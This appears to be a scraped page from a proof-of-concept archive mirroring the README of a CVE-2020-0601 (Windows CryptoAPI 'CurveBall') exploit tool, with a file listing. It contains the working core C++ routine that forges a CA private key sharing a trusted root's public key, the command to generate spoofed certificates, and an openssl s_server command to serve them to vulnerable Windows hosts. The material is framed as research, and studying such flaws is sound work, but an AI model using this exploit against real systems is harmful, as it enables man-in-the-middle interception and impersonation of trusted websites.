来源

关联漏洞

Description

CVE-2020-0601 proof of concept

介绍

# Basic Info

The source code of this tool is supposed to help with understanding of CVE-2020-0601 vulnerability discovered in Windows Crypto API, see [CERT's overview](https://kb.cert.org/vuls/id/849224/).

The tool itself can be used to produce a certificate for an arbitrary domain which will be signed by an evil certificate authority. This tool produces evil CA with the same public key as the one provided on command line.

When a web browser of a vulnerable Windows build targets this certificate, it will be considered as the trusted one. Thus allows suitably positioned network-based attacker to intercept victim's traffic.

# Synopsis

Launch the tool providing path to a trusted Windows certificate:
```bash
./cve-2020-0601_poc ~/path/to/USERTrustECCCertificationAuthority.crt
```

In the example above a [USERTrust ECC Certification Authority](http://www.tbs-x509.com/USERTrustECCCertificationAuthority.crt) is used with the following public key:
```
04:1A:AC:54:5A:A9:F9:68:23:E7:7A:D5:24:6F:53:C6:5A:D8:4B:AB:C6:D5:B6:D1:E6:73:71:AE:DD:9C:D6:0C:61:FD:DB:A0:89:03:B8:05:14:EC:57:CE:EE:5D:3F:E2:21:B3:CE:F7:D4:8A:79:E0:A3:83:7E:2D:97:D0:61:C4:F1:99:DC:25:91:63:AB:7F:30:A3:B4:70:E2:C7:A1:33:9C:F3:BF:2E:5C:53:B1:5F:B3:7D:32:7F:8A:34:E3:79:79
```

The tool will save several certificates and keys in its current working directory:
```
test-cve_evil-ca.crt -- evil CA
test-cve_evil-privkey.key -- evil CA's private key in PEM format
test-cve_evil-privkey-pk8.key -- evil CA's private key in PKCS#8 format
test-cve_host-cert.crt -- target host's certificate (example.com by default)
test-cve_host-privkey.key -- target host's private key (example.com by default)
```

To test certificates launch `openssl s_server` as follows and redirect request towards it requests of https://example.com/ from your vulnerable Windows box:
```bash
sudo openssl s_server -cert test-cve_host-cert.crt -key test-cve_host-privkey.key -chainCAfile test-cve_evil-ca.crt -www -accept 443
```

Be sure that the original certificate is cached!

The result should look like this one:
![example.com spoofing](./screen1.png)


# Build

`cmake` is used to generate make file to build this tool. As dependencies the following libraries are needed:
- openssl (> 1.0)
- cryptopp

Building:
```bash
mkdir build
cd build
cmake ..
make
```

# Description

Comprehensive (relatively) description at some point will be added to [Gremwell's website](https://www.gremwell.com/).

Start with looking at `main.cpp` file. It calls various OpenSSL wrappers which are important, but are not related to the vulnerability itself. The most interesting part is in `cve-2020-0601_poc.cpp` file:
```c++
bool craftEvilPrivKey(const char *caPubKeyRaw, size_t caPubKeyRawLen,
                      char *outEvilPrivKeyPKCS8, size_t maxSizePKCS8, size_t *outEvilPrivKeyPKCS8Len,
                      bool doSave, const char *evilPrivKeyFileName)
{
    // load public key of the provided certificate into native CryptoPP type
    DL_Keys_ECDSA<ECP>::PublicKey caPubKey;
    caPubKey.Load(CryptoPP::ArraySource((const CryptoPP::byte *)caPubKeyRaw,
                                         caPubKeyRawLen, true).Ref());

    // generate a private key using the same curve as in the provided CA certificate
    CryptoPP::AutoSeededRandomPool prng;
    DL_Keys_ECDSA<ECP>::PrivateKey privKeyBase;
    privKeyBase.Initialize(prng, caPubKey.GetGroupParameters());

    // get the private key elliptic curve parameters
    CryptoPP::Integer privKeyBaseExp = privKeyBase.GetPrivateExponent();
    ECP privKeyBaseCurve = privKeyBase.GetGroupParameters().GetCurve();
    CryptoPP::Integer privKeyBaseOrder = privKeyBase.GetGroupParameters().GetSubgroupOrder();

    // calculate an inverse value of the private key
    CryptoPP::Integer privKeyInverse = CryptoPP::EuclideanMultiplicativeInverse(privKeyBaseExp, privKeyBaseOrder);
    // produce our custom generator (base point) as a multiplication of the inverse value of our private key
    // and the public key of the provided CA certificate
    ECP::Point caPubKeyQ = caPubKey.GetPublicElement();
    ECP::Point evilG = privKeyBaseCurve.ScalarMultiply(caPubKeyQ, privKeyInverse);

    // create an "evil" private key object using the base private's key exponent and curve but
    // with our "evil" generator (base point)
    DL_Keys_ECDSA<ECP>::PrivateKey evilPrivKey;
    evilPrivKey.Initialize(privKeyBaseCurve, evilG, privKeyBaseOrder, privKeyBaseExp);

    // convert evil private key into PKCS8 format
    CryptoPP::ArraySink evilPrivKeyPKCS8As((CryptoPP::byte *)outEvilPrivKeyPKCS8, maxSizePKCS8);
    evilPrivKey.Save(evilPrivKeyPKCS8As.Ref());
    *outEvilPrivKeyPKCS8Len = evilPrivKeyPKCS8As.TotalPutLength();

    if (doSave) {
        // save it as-is so this can be imported by some tools
        evilPrivKey.Save(CryptoPP::FileSink(evilPrivKeyFileName).Ref());
    }

    // the code below converts the key to DER format
    // however, as we have here our custom curve (not the "named" one), most of the
    // tools are not able to properly import it. thus, leaving this code commented-out
#ifdef SUPPORT_DER_ENCODING
    CryptoPP::ArraySink evilPrivKeyDerAs((CryptoPP::byte *)outEvilPrivKeyDer, maxSizeDer);
    privKeyToDer(evilPrivKey, evilPrivKeyDerAs.Ref());
    *outEvilPrivKeyDerLen = evilPrivKeyDerAs.TotalPutLength();
#endif

    return true;
}
```

Comments here should be quite self-explanatory. :-)

# Acknowledgements

Thanks to [kudelskisecurity blog](https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/) and references mentioned there.

文件快照

 [4.0K]  /data/pocs/cd9a8c0c5ea86d55f87ddda9b1afc3591821eab0
├── [ 860]  CMakeLists.txt
├── [6.8K]  cve-2020-0601_poc.cpp
├── [ 358]  cve-2020-0601_poc.h
├── [4.0K]  FindCryptoPP.cmake
├── [3.1K]  main.cpp
├── [ 12K]  openssl-helper.cpp
├── [1.4K]  openssl-helper.h
├── [5.5K]  README.md
└── [ 53K]  screen1.png

0 directories, 9 files

备注